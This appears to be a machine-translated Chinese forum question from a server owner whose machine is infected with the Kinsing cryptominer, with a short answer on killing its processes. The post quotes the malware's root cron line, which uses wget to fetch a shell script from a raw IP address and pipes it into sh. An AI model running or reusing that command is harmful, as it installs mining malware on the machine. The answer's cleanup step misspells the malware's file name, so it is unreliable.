无法阻止 Kinsing 恶意软件创建 cronjob

无法阻止 Kinsing 恶意软件创建 cronjob

所以基本上我的新服务器已经感染了加密货币挖矿恶意软件 Kinsing。尽管我遵循了所有说明这里我似乎仍然无法阻止恶意软件在我的根 crontab 中创建此行:

* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1

这实际上会用恶意项目和r01.egg文件感染我的 Scrapyd 守护进程。

目前没有产生任何活动进程,恶意软件似乎也没有活动。这可能是因为我已锁定了具有受限权限的文件,如之前链接的资源所示。

我如何才能停止 cronjob 的启动?它似乎每天至少生成两次,甚至更多。

谢谢你,

答案1

步骤1 获取PID并杀死它们

ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi

Step2 删除文件

rm -f /tmp/kdevtmfsi

相关内容